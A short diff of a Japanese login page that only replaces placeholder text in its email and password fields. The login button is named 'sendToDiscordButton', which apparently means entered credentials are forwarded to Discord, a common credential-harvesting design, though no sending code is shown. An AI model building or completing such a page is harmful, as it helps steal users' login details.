--- a/index.html
+++ b/index.html
@@ -14,13 +14,13 @@
         <div class="form-group">
             
             <label for="emailInput" class="input-label">メールアドレスを入力</label>
-            <input type="text" id="emailInput" class="text-input" placeholder="あ">
+            <input type="text" id="emailInput" class="text-input" placeholder="メールアドレス">
         </div>
 
         <div class="form-group">
             
             <label for="passwordInput" class="input-label">パスワードを入力</label>
-            <input type="password" id="passwordInput" class="text-input" placeholder="g">
+            <input type="password" id="passwordInput" class="text-input" placeholder="パスワード">
         </div>
 
         <button id="sendToDiscordButton" class="submit-button">ログインする</button>
